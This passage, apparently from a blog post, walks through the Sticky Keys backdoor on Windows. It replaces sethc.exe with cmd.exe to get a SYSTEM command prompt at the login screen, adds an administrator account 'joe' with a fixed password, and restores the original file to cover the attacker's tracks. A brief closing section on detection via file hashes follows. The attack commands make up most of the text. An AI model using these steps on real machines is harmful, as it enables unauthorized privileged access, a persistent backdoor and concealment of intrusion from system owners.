- Replace
sethc.exewithcmd.exe: Open a command prompt with administrative privileges and run.
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bakcopy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
- Trigger the Goodies: At the login screen, press the Shift key five times. This opens a command prompt with SYSTEM-level privileges.
- Create a New User: In the command prompt, create a new user account with administrative privileges:
net user joe P@ssw0rd /add net localgroup administrators joe /add- Username:
joe - Password: P@ssw0rd
- Restore
sethc.exe: To cover their tracks, the attacker can restore the originalsethc.exe:
copy C:\Windows\System32\sethc.exe.bak C:\Windows\System32\sethc.exe
Detecting Unauthorized Changes:
- Verify File Hashes: Compare the hash of
sethc.exewith a known good version using PowerShell:
Get-FileHash C:\Windows\System32\sethc.exe -Algorithm SHA256
- Check File Properties: Ensure the properties of
sethc.exematch those of a standard Windows installation.
No comments:
Post a Comment
Komentar=